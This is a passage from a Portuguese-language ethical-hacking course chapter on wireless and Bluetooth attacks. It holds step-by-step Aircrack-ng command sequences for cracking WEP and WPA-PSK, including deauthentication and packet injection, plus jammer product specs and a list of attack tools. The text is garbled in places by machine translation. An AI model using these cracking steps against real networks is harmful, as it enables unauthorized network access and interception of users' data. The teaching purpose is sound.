conexão para comprometer a segurança. Muitas organizações falham em manter as políticas de segurança Wi-Fi e
não tomam medidas adequadas para eliminar essa falha nas configurações de segurança.
À medida que as redes Wi-Fi das organizações se expandem para mais locais e mais dispositivos, os APs mal
configurados tornam-se cada vez mais perigosos. Os elementos-chave que desempenham um papel importante
neste tipo de ataque incluem o seguinte:
ÿ Transmissão SSID: um invasor configura APs para transmitir SSIDs para usuários autorizados. Todos os
modelos de AP têm seu próprio SSID padrão, e APs com configurações padrão usando SSIDs padrão são
vulneráveis a ataques de dicionário de força bruta. Mesmo que os usuários habilitem o WEP, um SSID não
criptografado transmite a senha em texto sem formatação.
ÿ Senha fraca: Alguns administradores de rede usam incorretamente SSIDs como senhas básicas para verificar
usuários autorizados. Os SSIDs atuam como senhas rudimentares e ajudam os administradores de rede a
reconhecer dispositivos sem fio autorizados na rede.
ÿ Erro de configuração: Os erros de configuração incluem erros cometidos durante a instalação, políticas de
configuração em um AP, erros humanos cometidos ao solucionar problemas de WLAN

problemas e alterações de segurança não implementadas uniformemente em uma arquitetura.

A transmissão de SSID é um erro de configuração que ajuda os invasores a roubar um SSID,
o que faz com que o AP assuma que o invasor está tentando uma conexão legítima.
Figura 8.11: Ataque AP mal configurado

Associação não autorizada
Wi-Fi Usuário-1 Usuário infectado com Trojan de habilitação de Wi-Fi
Wi-Fi Usuário-2
Recepção
Unidade GPS
Contabilidade
Departamento
Ponto de acesso
Posse de ações 2 Usuário Wi-Fi-3

Posse de ações 1
Casa de produção
01 02 03
Soft APs são cartões de cliente Os invasores infectam a Os invasores se
ou rádios WLAN embutidos em máquina da vítima e ativam soft conectam a redes
alguns PDAs e laptops que APs, permitindo assim a corporativas por meio de APs
podem ser iniciados conexão não autorizada à flexíveis em vez dos APs reais
inadvertidamente ou por meio rede corporativa Atacante
de um programa de vírus
Associação não autorizada
A associação não autorizada é uma grande ameaça às redes sem fio. Tem duas formas: associação acidental e
associação maliciosa. Um invasor realiza associação maliciosa com a ajuda de APs flexíveis em vez de APs
corporativos. O invasor cria um AP flexível, geralmente em um laptop, executando uma ferramenta que faz a NIC do
laptop parecer um AP legítimo. O invasor então usa o soft AP para obter acesso à rede sem fio de destino. APs de
software estão disponíveis em cartões de cliente ou rádios WLAN embutidos em alguns PDAs e laptops; um invasor
pode iniciá-los diretamente ou por meio de um programa de vírus. O invasor infecta a máquina da vítima e ativa os
soft APs, permitindo uma conexão não autorizada à rede corporativa. Um invasor que obtém acesso à rede usando
associação não autorizada pode roubar senhas, lançar ataques em uma rede com fio ou plantar cavalos de Tróia. Por
outro lado, a associação acidental envolve a conexão ao ponto de acesso da rede de destino a partir da rede
sobreposta de uma organização vizinha sem o conhecimento da vítima.

Figura 8.12: Ataque de associação não autorizado

Ataque de conexão ad hoc
Rede wi-fi do hotel

Processamento de dados
Quarto
Sala de Testes
Wi-Fi ativado pelo usuário
Conexão ad hoc
Saguão
Os clientes Wi-
Fi se comunicam
diretamente por meio de
um modo ad hoc que não
Um modo ad hoc é
requer um AP para retransmitir pacotes
inerentemente inseguro
e não fornece autenticação
e criptografia fortes
Assim, os invasores podem se
conectar facilmente e comprometer Atacante
o cliente corporativo operando no
modo ad hoc
Ataque de conexão ad hoc
Os clientes Wi-Fi podem se comunicar diretamente por meio de um modo ad-hoc que não requer um AP para
retransmitir pacotes. Os dados podem ser convenientemente compartilhados entre clientes em redes ad-hoc,
bastante populares entre os usuários de Wi-Fi. As ameaças de segurança surgem quando um invasor força uma
rede a habilitar o modo ad-hoc. Alguns recursos de rede são acessíveis apenas no modo ad-hoc, mas esse modo é
inerentemente inseguro e não fornece autenticação ou criptografia forte. Assim, um invasor pode se conectar
facilmente e comprometer um cliente operando no modo ad-hoc. Um invasor que penetra em uma rede sem fio
também pode usar uma conexão ad hoc para comprometer a segurança da LAN com fio da organização.
Figura 8.13: Ataque de conexão Ad-Hoc

Honeypot AP Ataque
SSID Verizon SSID Vodafone SSID McDonald's Café SSID Starbucks SSID AT&T
Atacante prende vítimas usando hotspots falsos

Atacante
Honeypot AP Ataque
Se várias WLANs coexistirem na mesma área, um usuário poderá se conectar a qualquer rede disponível.
Essas áreas são vulneráveis a ataques. Normalmente, quando um cliente sem fio é ligado, ele sonda uma
rede sem fio próxima em busca de um SSID específico. Um invasor tira proveito desse comportamento de
clientes sem fio configurando uma rede sem fio não autorizada usando um AP não autorizado. Este AP possui
antenas de alta potência (alto ganho) e usa o mesmo SSID da rede de destino. Os usuários que se conectam
regularmente a várias WLANs podem se conectar ao AP não autorizado. Esses APs montados por invasores
são chamados de APs “honeypot”. Eles transmitem um sinal de beacon mais forte do que os APs legítimos,
para que os NICs que procuram o sinal mais forte disponível possam se conectar ao AP não autorizado. Se
um usuário autorizado se conectar a um honeypot AP, uma vulnerabilidade de segurança é criada e
informações confidenciais do usuário, como identidade, nome de usuário e senha, podem ser reveladas ao invasor.

Figura 8.14: Ataque Honeypot AP

Spoofing AP MAC
O hacker falsifica o endereço MAC do equipamento do
cliente WLAN para mascarar como um cliente autorizado
H O invasor se conecta ao AP como um cliente autorizado
e escuta informações confidenciais
Dispositivo com endereço MAC:

00-0C-F1-56-98-AD
Somente
Produção
computadores do
Departamento
Recepção departamento de
Contabilidade
produção podem se conectar a mim
Departamento
eu sou MAC
Atacante 00-0C-F1-
56-98-AD
Hacker falsificando o endereço MAC
Spoofing AP MAC
Em redes sem fio, as sondas de transmissão dos APs respondem por meio de beacons para anunciar
presença e disponibilidade. As respostas da sonda contêm informações sobre a identidade do AP
(endereço MAC) e a identidade da rede que ele suporta (SSID). Os clientes nas proximidades se
conectam à rede por meio desses beacons com base no endereço MAC e no SSID que ele contém.
Muitas ferramentas de software e APs permitem definir valores definidos pelo usuário para os
endereços MAC e SSIDs dos dispositivos AP. Um invasor pode falsificar o endereço MAC do AP
programando um AP não autorizado para anunciar as mesmas informações de identidade do AP
legítimo. Um invasor conectado ao AP como um cliente autorizado pode ter acesso total à rede. Esse
tipo de ataque é bem-sucedido quando a rede sem fio alvo usa filtragem MAC para autenticar clientes (usuários).
Figura 8.15: falsificação AP MAC

Ataque de reinstalação de chave (KRACK)
Handshake de 4 vias WPA2

Todas as redes Wi-Fi seguras usam o Mensagem 1 (ANunciação)
processo de handshake de 4 vias para ingressar na rede Mensagem 2 (SNonce assinado)
e gerar uma nova chave de criptografia que será usada Mensagem 3 (assinado ANonce,
Instalação da chave de criptografia)
para criptografar o tráfego de rede
Ponto de acesso
Mensagem 4 (Reconhecimento)
Android/Linux Internet
Do utilizador
Ataque KRACK em WPA2 4-Way Handshake

O ataque KRACK funciona explorando o handshake de
4 vias do protocolo WPA2, forçando Mensagem 1 (ANunciação)
Núncio reutilizar Mensagem 2 (SNonce assinado)
Mensagem 3 (assinado ANonce,

Instalação da chave de criptografia)
Ponto de acesso
Android/Linux Atacante intercepta o Internet
Do utilizador tráfego
O KRACK funciona contra todas as redes Wi-Fi
protegidas modernas e permite que invasores roubem Pacote vai viajar
O atacante agora pode ler
todos os pacotes que a
informações confidenciais, como números de cartão de através do ponto de
vítima envia
acesso clonado do invasor
crédito, senhas, mensagens de bate-papo, e-mails e fotos
Atacante com ponto de
acesso clonado
Ataque de reinstalação de chave (KRACK)

O ataque de reinstalação de chave (KRACK) explora as falhas na implementação do processo de
handshake de quatro vias no protocolo de autenticação WPA2, que é usado para estabelecer uma
conexão entre um dispositivo e um AP. Todas as redes Wi-Fi seguras usam o processo de handshake
de quatro vias para estabelecer conexões e gerar uma nova chave de criptografia que será usada
para criptografar o tráfego de rede.
Figura 8.16: Processo de handshake de quatro vias em WPA2
O invasor explora o handshake de quatro vias do protocolo WPA2 forçando a reutilização do Nonce.
Nesse ataque, o invasor captura a chave ANonce da vítima que já está em uso para manipular e
reproduzir mensagens criptográficas de aperto de mão. Este ataque funciona contra todas as redes
Wi-Fi protegidas modernas (WPA e WPA2); redes pessoais e empresariais; e as cifras WPA-TKIP,
AES-CCMP e GCMP. Ele permite que o invasor roube informações confidenciais, como números de
cartão de crédito, senhas, mensagens de bate-papo, e-mails e fotos. Qualquer dispositivo que
execute Android, Linux, Windows, Apple, OpenBSD ou MediaTek é vulnerável a alguma variante do
ataque KRACK.

Figura 8.17: Ataque KRACK explorando o processo de handshake de quatro vias em WPA2

Ataque de sinal de bloqueio
Todas as redes sem fio são

propenso a emperrar
Este sinal de interferência

causa um DoS porque 802.11
é um protocolo CSMA/CA
cujos algoritmos de prevenção
de colisão requerem um período
de silêncio antes que um rádio
possa transmitir
Invasor
enviando sinais de
interferência de 2,4 GHz
Um atacante vigia o
área de um local próximo com
um amplificador de alto ganho
abafando o AP legítimo
Atacante Bloqueio
Dispositivo
Ataque de sinal de bloqueio
O bloqueio é um ataque realizado em uma rede sem fio para comprometê-la. Nesse tipo de exploração, grandes
volumes de tráfego malicioso resultam em um DoS para usuários autorizados, obstruindo o tráfego legítimo.
Todas as redes sem fio são propensas a interferências, e os ataques de interferência de espectro geralmente
bloqueiam completamente todas as comunicações.
Um invasor usa hardware especializado para realizar esse tipo de ataque. Os sinais gerados pelos dispositivos
interferentes parecem ser ruído para os dispositivos na rede sem fio, o que faz com que eles retenham suas
transmissões até que o sinal diminua, resultando em um DoS. Além disso, os ataques de sinal de bloqueio não
são facilmente perceptíveis. O procedimento de um ataque de sinal de interferência é resumido a seguir.
ÿ Um invasor vigia a área-alvo de um local próximo com um amplificador de alto ganho

que abafa um AP legítimo.
ÿ Os usuários não conseguem fazer o login ou são desconectados pelo poder avassalador nas proximidades
sinal.
ÿ O sinal de bloqueio causa um DoS porque 802.11 é um protocolo CSMA/CA, cujos algoritmos de
prevenção de colisão requerem um período de silêncio antes que um rádio possa transmitir.

Figura 8.18: Ataque de sinal de bloqueio

Dispositivos de bloqueio de Wi-Fi
CPB-3016N-E5G Vergonha PCB-2040 Vergonha CPB-2060B Que pena

Alcance: 50 - 150 metros Alcance: 20 - 50 metros Alcance: 10 - 40 metros
6 antenas 4 antenas 6 antenas
6 bandas de frequência 4 bandas de frequência 6 bandas de frequência

bloqueadas (CDMA - GSM bloqueadas (2G - 3G - 4G – bloqueadas (GPS - 4G - Wi-Fi)
- 3G - Wi-Fi/Bluetooth) GPS - WiFi)
Bateria interna: 2,5 – 3,0 horas
Montável na parede Tempo de trabalho: 40 minutos
Bloqueador CPB-2660H-A4G CPB-2061 Que pena Bloqueador CPB-2680H-AGP
Alcance: 20 - 60 metros Alcance: 10 - 40 metros Alcance: 20 - 60 metros
6 antenas 6 antenas 8 antenas
6 bandas de frequência 6 bandas de frequência 8 bandas de frequência

obstruídas (CDMA - DCS bloqueadas (Celular - Wi-Fi - bloqueadas (CDMA - GPS
- 3G - 4G - Wi-Fi) GPS) - DCS - 3G - 4G - Wi-Fi)
Montável na parede Montável na parede Montável na parede
http:// www.techwisetech.com
Dispositivos de bloqueio de Wi-Fi
Um invasor pode bloquear uma rede sem fio usando um bloqueador de Wi-Fi. Este dispositivo usa a mesma banda
de frequência de uma rede confiável. Causa interferência em sinais legítimos e interrompe temporariamente o serviço
de rede.
Veja a seguir exemplos de dispositivos de bloqueio de Wi-Fi:
Fonte: http:// www.techwisetech.com
ÿ Jammer CPB-3016N-E5G
o Alcance: 50–150 m
o 6 antenas
o 6 bandas de frequência bloqueadas (CDMA, GSM, 3G, Wi-Fi/Bluetooth)
o Montável na parede
Figura 8.19: bloqueador CPB-3016N-E5G

ÿ Bloqueador PCB-2040
o 4 antenas
o 4 bandas de frequência bloqueadas (2G, 3G, 4G, GPS, Wi-Fi)
o Tempo de trabalho: 40 min
Figura 8.20: bloqueador PCB-2040
ÿ CPB-2060B Vergonha
o 6 antenas
o 6 bandas de frequência bloqueadas (GPS, 4G, Wi-Fi)
o Duração da bateria interna: 2,5–3,0 h
Figura 8.21: bloqueador CPB-2060B
ÿ Jammer CPB-2660H-A4G
o 6 antenas
o 6 bandas de frequência bloqueadas (CDMA, DCS, 3G, 4G, Wi-Fi)
Figura 8.22: bloqueador CPB-2660H-A4G

ÿ CPB-2061 Pena
o 6 antenas
o 6 bandas de frequência bloqueadas (Mobile, Wi-Fi, GPS)
Figura 8.23: bloqueador CPB-2061
ÿ Bloqueador CPB-2680H-AGP
o 8 antenas
o 8 bandas de frequência bloqueadas (CDMA, GPS, DCS, 3G, 4G, Wi-Fi)
Figura 8.24: bloqueador CPB-2680H-AGP

Quebrando WEP usando Aircrack-ng

Prompt de comando
Executar airmon-ng no modo monitor
OPÇÃO 01
C:\>airmon-ng start eth1 Passo 1

C:\>airodump-ng --ivs --write capture eth1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:24:2B:CD:68:EF 99 5 60 3 0 1 54º OPN IAMROGER
02:24:2B:CD:68:EE 99 9 75 2 0 5 54º OPN COMPANYZONE Inicie o airodump para descobrir

00:14:6C:95:6C:FC 99 0 15 0 0 9 54e WEP WEP CASA SSIDs na interface e mantenha-o
1E:64:51:3B:FF:3E 76 70 157 1 0 11 54e WEP WEP SECRET_SSID funcionando; seu arquivo de
OPÇÃO 01
Passo 2 captura deve conter mais de 50.000

BSSID Estação Sondagens de pacotes perdidos de taxa de PWR IVs para quebrar com sucesso a chave WEP
1E:64:51:3B:FF:3E 00:17:9A:C3:CF:C2 -1 1-0 0 1
1E:64:51:3B:FF:3E 00:1F:5B:BA:A7:CD 76 1e-54 0 6
Prompt de comando
Associe sua placa sem fio ao AP de
OPÇÃO 01
C:\>aireplay-ng -1 0 -e SECRET_SSID -a 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1 etapa 3 destino

22:25:10 Aguardando quadro de sinalização (BSSID: 1E:64:51:3B:FF:3E) no canal 11
22:25:10 Enviando Pedido de Autenticação SSID alvo Endereço MAC de destino

22:25:10 Autenticação bem-sucedida
22:25:10 Enviando Solicitação de Associação

22:25:10 Associação com sucesso :-)
Quebrando WEP usando Aircrack-ng (continuação)

Prompt de comando
Injete pacotes usando aireplay-ng
OPÇÃO 01
C:\>aireplay-ng -3 -b 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1 Passo 4 para gerar tráfego no AP de destino

22:30:15 Aguardando quadro de sinalização (BSSID: 1E:64:51:3B:FF:3E)
Salvando solicitações ARP em replay_arp-0219-123051.cap Você
também deve iniciar o airodump-ng para capturar as respostas. Liu
11.978 pacotes (obteve 7.193 solicitações ARP), enviou 3.902 pacotes...
Prompt de comando Aguarde o airodump-ng capturar

mais de 50.000 IVs; quebrar chave
OPÇÃO 01
C:\>aircrack-ng -s capture.ivs Passo 5 WEP usando aircrack-ng

Abrindo capture.ivs Leia
75168 pacotes.
Aircrack-ng 0.7 r130
[00:00:10] Testado 77 chaves (conseguiu 684002 IVs)
KB de profundidade de byte (voto)
0 0/ 1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0)
1 0/ 3 66(41) F1(33) 4C(23) 00(19) 9F(19) C7(18) 64(9) 7A(9) 7B(9) F6(9)
2 0/ 2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10)
3 0/ 1 FD( 375) 81( 40) 1D( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17)
CHAVE ENCONTRADA! [ AE:66:5C:FD:24 ]
Quebrando WEP usando Aircrack-ng
A criptografia WEP pode ser quebrada usando Aircrack-ng através das seguintes etapas.
ÿ Execute airmon-ng no modo monitor.

ÿ Inicie o airodump para descobrir SSIDs na interface e mantê-lo em execução. o arquivo de captura
deve conter mais de 50.000 IVs para quebrar com sucesso a chave WEP.
Figura 8.25: captura de tela exibindo a execução de airmon-ng e airodump-ng
ÿ Associe a placa sem fio do sistema ao AP de destino.
Figura 8.26: Captura de tela exibindo a execução de aireplay-ng
ÿ Injetar pacotes usando aireplay-ng para gerar tráfego no AP de destino.
Figura 8.27: captura de tela exibindo a geração de tráfego

ÿ Aguarde o airodump-ng capturar mais de 50.000 IVs. Quebre a chave WEP usando
aircrack-ng.
Figura 8.28: Captura de tela exibindo a quebra da chave WEP

Quebrando WPA-PSK usando Aircrack-ng

Passo 3: Deauth o cliente usando Aireplay-ng; o cliente tentará
Passo 1 autenticar com o AP, o que levará ao airodump capturando um
pacote de autenticação (WPA handshake)
Monitore o tráfego sem fio com airmon-ng
Prompt de comando
C:\>airmon-ng start eth1
C:\>aireplay-ng --deauth 11 -a 02:24:2B:CD:68:EE
Passo 2
Etapa 4: execute o arquivo de captura por meio do aircrack-ng
Colete dados de tráfego sem fio com airodump-ng
C:\>airodump-ng --write capture eth1 Prompt de comando
C:\>aircrack-ng.exe -a 2 -w capture.cap
Prompt de comando Abrindo capture.cap
Leia 607 pacotes #
BSSIS ESSID Criptografia 1
C:\>airmon-ng start eth1 02:24:2B:CD:68:EE COMPANYZONE WPA <1 handshake>
C:\>airodump-ng --write capture eth1 Escolhendo a primeira rede como destino.
Abrindo ../capture.cap
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
Pacotes pendentes, aguarde...
02:24:2B:CD:68:EF 99 5 60 3 0 1 54º OPN IAMROGER Aircrack-ng 0,7 r130
02:24:2B:CD:68:EE 99 9 75 2 0 5 54e WPA TKIP PSK COMPANYZONE [00:00:03] 230 teclas testadas (73,41 k/s)
CHAVE ENCONTRADA! [ senha ]
00:14:6C:95:6C:FC 99 0 15 0 0 9 54e WEP WEP CASA
Chave Mestra: CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
1E:64:51:3B:FF:3E 76 70 157 1 0 11 54e WEP WEP SECRET_SSID 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE
Chave Transciente: 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
BSSID Estação Sondagens de pacotes perdidos de taxa de PWR 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
1E:64:51:3B:FF:3E 00:17:9A:C3:CF:C2 -1 1-00 1 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD
1E:64:51:3B:FF:3E 00:1F:5B:BA:A7:CD 76 1e-54 0 6
EAPOL HMAC: 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
Quebrando WPA-PSK usando Aircrack-ng
WPA-PSK é um mecanismo de autenticação no qual os usuários fornecem algum tipo de credencial para
autenticação em uma rede. WPA e WPA-PSK usam o mesmo mecanismo de criptografia e a única diferença
entre eles está no mecanismo de autenticação. A autenticação no WPA PSK envolve uma senha comum
simples. O modo PSK do WPA é vulnerável aos mesmos riscos de qualquer outro sistema de senha
compartilhada.
Um invasor pode quebrar o WPA-PSK porque a senha criptografada é compartilhada em um aperto de mão
de quatro vias. No esquema WPA-PSK, quando os clientes tentam acessar um AP, eles passam por um
processo de quatro etapas para autenticação. Esse processo envolve o compartilhamento de uma senha
criptografada entre eles. O invasor captura a senha e tenta quebrar o esquema WPA-PSK. Isso também
pode ser considerado um ataque KRACK.
A seguir estão as etapas para quebrar o WPA-PSK:
ÿ Monitore o tráfego sem fio com airmon-ng usando o seguinte comando:

C:\>airmon-ng start eth1

ÿ Colete dados de tráfego sem fio com airodump-ng usando o seguinte comando:
C:\>airodump-ng --write capture eth1
Figura 8.29: captura de tela exibindo a execução de airmon-ng e airodump-ng
ÿ Cancele a autenticação (deauth) do cliente usando o Aireplay-ng. O cliente tentará autenticar com o
AP, o que leva ao airodump capturando um pacote de autenticação (WPA handshake).
Figura 8.30: captura de tela exibindo a desautenticação do cliente usando aireplay-ng
ÿ Execute o arquivo de captura através do aircrack-ng.
Figura 8.31: Captura de tela exibindo a quebra de chave WPA

Ferramentas de ataque sem fio
Aircrack-ng é um conjunto de software de rede que consiste em um detector, farejador

Aircrack-ng de pacotes, cracker WEP e WPA/WPA2-PSK e uma ferramenta de análise para redes
Suíte
sem fio 802.11; o programa roda em Linux e Windows http:// www.aircrack-ng.org
1 2 3 4
Airbase-ng Aircrack-ng airdecap-ng aerógrafo de
Captura handshake WPA/ De fato WEP e WPA/WPA2- Descriptografa WEP/WPA/WPA2 e Cria relacionamento cliente-AP e gráfico
WPA2 e pode atuar como ferramenta de cracking PSK pode ser usado para retirar os de sonda comum a partir do arquivo
um AP ad-hoc cabeçalhos sem fio de pacotes Wi-Fi airodump
5 6 7 8
Airmon-ng Airtun-ng Lado de do Packetforge
Usado para ativar o modo monitor Cria uma interface de túnel virtual para Permite a comunicação através de um Usado para criar pacotes
em interfaces sem fio a partir do monitorar o tráfego criptografado e injetar AP criptografado com WEP sem criptografados que podem ser
modo gerenciado e vice-versa tráfego arbitrário em uma rede o conhecimento da chave WEP usados posteriormente para injeção
9 10 11 12
Airdecloak-ng Airdrop-ng Aireplay-ng Wesside-ng

Remove a camuflagem WEP Usado para desautenticação Usado para geração Incorpora diferentes técnicas
de um arquivo pcap de usuários direcionada e de tráfego, autenticação para obter perfeitamente
baseada em regras falsa, reprodução de pacotes e uma
injeção de solicitação ARP Chave WEP em
minutos
13
Airodump-ng Usado Ferramentas de ataque sem fio

para capturar pacotes de quadros
802.11 brutos e coletar WEP IVs
(continua)
14 15 16 17
Airolib-ng serviço aéreo Tkiptun-ng WZCook

Armazena e gerencia listas Permite que vários Injeta quadros em um Recupera chaves WEP do
Rede WPA TKIP com utilitário de configuração
de essid e senha usadas em programas usem
cracking WPA/WPA2 independentemente uma placa QoS e pode recuperar um zero sem fio do XP
Wi-Fi por meio de uma conexão Chave MIC e keystream do
TCP cliente-servidor tráfego Wi-Fi

Ferramentas de ataque sem fio (continuação)
AirMagnet WiFi Ele é usado para realizar análise Wi-Fi confiável de redes sem fio
Analisador PRO 802.11a/b/g/n/ax sem perder nenhum tráfego
Ettercap
https:// www.ettercap-project.org
Wifiphisher
https:// wifiphisher.org
Reaver
https:// github.com
Fern Wifi Cracker

https:// github.com
Elcomsoft Wireless Security

Auditor https:// www.elcomsoft.com
https:// www.netally.com
Ferramentas de ataque sem fio
Discutidas abaixo estão algumas das importantes ferramentas de ataque sem fio:
ÿ Suíte Aircrack-ng
Fonte: http:// www.aircrack-ng.org
Aircrack-ng é um conjunto de software de rede que consiste em um detector, sniffer de pacotes, cracker WEP
e WPA/WPA2 PSK e ferramenta de análise para redes sem fio 802.11. Este programa é executado em Linux
e Windows.
o Airbase-ng: Captura o handshake WPA/WPA2 e pode atuar como AP ad-hoc.
o Aircrack-ng: Este programa é de fato a ferramenta de cracking WEP e WPA/WPA2 PSK.
o Airdecap-ng: Descriptografa WEP/WPA/WPA2 e pode ser usado para remover cabeçalhos sem fio de
pacotes Wi-Fi.
o Airdecloak-ng: Remove a camuflagem WEP de um arquivo pcap.
o Airdrop-ng: Este programa é usado para a desautenticação direcionada e baseada em regras de

usuários.
o Aireplay-ng: É usado para geração de tráfego, autenticação falsa, repetição de pacotes e

Injeção de solicitação ARP.
o Airgraph-ng: Este programa cria uma relação cliente-AP e sonda comum

gráfico de um arquivo airodump.
o Airmon-ng: É usado para mudar do modo gerenciado para o modo monitor em

interfaces sem fio e vice-versa.

o Airodump-ng: Este programa é usado para capturar pacotes de quadros 802.11 brutos e
coletar WEP IVs.
o Airolib-ng: Este programa armazena e gerencia ESSID e listas de senhas usadas em WPA/
WPA2 quebrando.
o Airserv-ng: permite que vários programas usem um cartão Wi-Fi de forma independente por meio de um
conexão TCP cliente-servidor.
o Airtun-ng: Cria uma interface de túnel virtual para monitorar o tráfego criptografado e injetar
tráfego arbitrário em uma rede.
o Easside-ng: Este programa permite que o usuário se comunique através de um AP criptografado com WEP
sem conhecer a chave WEP.
o Packetforge-ng: Os invasores podem usar este programa para criar pacotes criptografados que podem
ser usados posteriormente para injeção.
o Tkiptun-ng: Injeta quadros em uma rede WPA TKIP com QoS e pode recuperar chaves MIC e fluxos de
chaves do tráfego Wi-Fi.
o Wesside-ng: Este programa incorpora várias técnicas para obter uma

Chave WEP em minutos.
o WZCook: É usado para recuperar chaves WEP do utilitário Wireless Zero Configuration
do Windows XP.
ÿ AirMagnet WiFi Analyzer PRO
Fonte: https:// www.netally.com
O AirMagnet WiFi Analyzer PRO é uma ferramenta de auditoria e solução de problemas de tráfego de rede
Wi-Fi que fornece análise Wi-Fi precisa, independente e confiável em tempo real de redes sem fio 802.11a/b/
g/n/ax sem tráfego.
Os invasores usam o AirMagnet WiFi Analyzer PRO para coletar detalhes como conectividade de rede sem
fio, cobertura de Wi-Fi, desempenho, roaming, interferência e problemas de segurança de rede.

Figura 8.32: Captura de tela do AirMagnet WiFi Analyzer PRO
A seguir estão algumas ferramentas adicionais de ataque sem fio:
ÿ Ettercap (https:// www.ettercap-project.org)
ÿ Wifiphisher (https:// wifiphisher.org)
ÿ Reaver (https:// github.com)
ÿ Fern Wifi Cracker (https:// github.com)
ÿ Elcomsoft Wireless Security Auditor (https:// www.elcomsoft.com)

Fluxo do módulo

Terminologia

Entenda o Bluetooth
Ataques
Contramedidas
Entenda os ataques de Bluetooth
Bluetooth é uma tecnologia sem fio que permite que os dispositivos compartilhem dados em distâncias curtas.
A tecnologia Bluetooth é vulnerável a vários tipos de ataques. Por meio do hacking do Bluetooth, um invasor
pode executar várias operações maliciosas no dispositivo móvel de destino. Esta seção discute ameaças de
Bluetooth e ferramentas de ataque de Bluetooth.

Pilha Bluetooth
Inscrição
O TCP/IP NO
B
x PPP
Middleware
Protocolo
Grupo
de
de
RFCOMM TCS SDP
L2CAP
ÿ Bluetooth é uma ÿ Permite que os dispositivos

IHC
tecnologia de compartilhar dados em
comunicação sem distâncias curtas Gerenciador de links áudio
fio de curto alcance que transporte
protocolo
de
substitui os cabos que Banda base
conectam dispositivos
portáteis ou fixos , Rádio Bluetooth
mantendo altos níveis de segurança
Pilha Bluetooth
Bluetooth é uma tecnologia de comunicação sem fio de curto alcance que substitui os cabos que conectam
dispositivos portáteis ou fixos, mantendo altos níveis de segurança. Ele permite que telefones celulares,
computadores e outros dispositivos troquem informações. Dois dispositivos habilitados para Bluetooth se conectam
por meio de uma técnica de emparelhamento.
Uma pilha Bluetooth refere-se a uma implementação da pilha de protocolo Bluetooth. Ele permite que um aplicativo
de herança funcione por Bluetooth. Um usuário pode portar para qualquer sistema usando a camada de abstração
do sistema operacional Atinav. A figura abaixo ilustra uma pilha Bluetooth.
Figura 8.33: Arquitetura de uma pilha Bluetooth
A pilha Bluetooth tem duas partes: propósito geral e sistema embarcado.

Modos Bluetooth
Modos detectáveis
ÿ Detectável: Envia respostas a todas as

perguntas
01
ÿ Detectável limitado: Visível por um
determinado período de tempo
ÿ Não detectável: Nunca responde a uma

verificação de inquérito
Modos de emparelhamento
ÿ Modo não pareável: Rejeita todas as solicitações de

02 pareamento
ÿ Modo emparelhável: Pares mediante solicitação
Modos Bluetooth
Um usuário pode definir o Bluetooth nos seguintes modos.
ÿ Modos detectáveis
O Bluetooth opera nos três modos detectáveis a seguir.
o Detectável: quando os dispositivos Bluetooth estão no modo detectável, eles ficam visíveis para outros
dispositivos habilitados para Bluetooth. Se um dispositivo tentar se conectar a outro, o dispositivo que
está tentando estabelecer a conexão deve procurar um dispositivo que esteja no modo detectável; caso
contrário, o dispositivo que está tentando iniciar a conexão não será capaz de detectar o outro dispositivo.
O modo detectável é necessário apenas durante a conexão a um dispositivo pela primeira vez. Ao salvar
a conexão, os dispositivos lembram um do outro; portanto, o modo detectável não é necessário para o
estabelecimento da conexão lateral.
o Detectável limitado: No modo detectável limitado, os dispositivos Bluetooth são detectáveis apenas por
um período limitado, para um evento específico ou durante condições temporárias. No entanto, não há
nenhum comando de interface do controlador de host (HCI) para definir um dispositivo diretamente no
modo detectável limitado. Um usuário tem que fazer isso indiretamente.
Quando um dispositivo é definido no modo detectável limitado, ele filtra os IACs não correspondentes e
se revela apenas para aqueles correspondentes.
o Não detectável: Definir um dispositivo Bluetooth para o modo não detectável impede que esse dispositivo
apareça na lista durante um processo de pesquisa de dispositivo habilitado para Bluetooth. No entanto,
ele permanece visível para usuários e dispositivos que foram emparelhados anteriormente com ele ou
conhecem seu endereço MAC.

ÿ Modos de emparelhamento
A seguir estão os modos de emparelhamento para dispositivos Bluetooth.
o Modo não pareável: No modo não pareável, um dispositivo Bluetooth rejeita o pareamento
solicitações enviadas por qualquer dispositivo.
o Modo emparelhável: No modo emparelhável, um dispositivo Bluetooth pode aceitar solicitações de emparelhamento e estabelecer uma
conexão com um dispositivo que solicitou o emparelhamento.

hackear bluetooth
ÿ Bluetooth hacking refere-se à exploração de vulnerabilidades de implementação de pilha Bluetooth para comprometer
dados confidenciais em dispositivos e redes habilitados para Bluetooth
Ataques Bluetooth
Bluesmacking Bluejacking Bluesnarfing BlueSniff Bluebugging
Ataque DoS, que A arte de enviar o roubo de Código de prova de Acessando remotamente
transborda dispositivos mensagens não solicitadas informações de um conceito para um um dispositivo habilitado
habilitados para Bluetooth por Bluetooth para dispositivo sem fio por meio Utilitário para Bluetooth e usando
com pacotes aleatórios, faz com Dispositivos habilitados de uma conexão Bluetooth de direção Bluetooth seus recursos
que os dispositivos travem para Bluetooth , como
telefones celulares e laptops
Hackear Bluetooth (continuação)
Ataques Bluetooth
Homem no meio
Falsificação de MAC
BluePrinting Btlejacking KNOB Ataque /Representação
Ataque
Ataque
A arte de coletar informações Prejudicial para dispositivos Explorando A interceptação de Modificando dados
sobre BLE, é usado para burlar uma vulnerabilidade em dados destinados a outros entre dispositivos habilitados
habilitado para Bluetooth Bluetooth para habilitado para Bluetooth para Bluetooth
mecanismos de segurança
e ouvir espionar todos os dados dispositivos
dispositivos, como comunicando-se em um
que estão sendo piconet
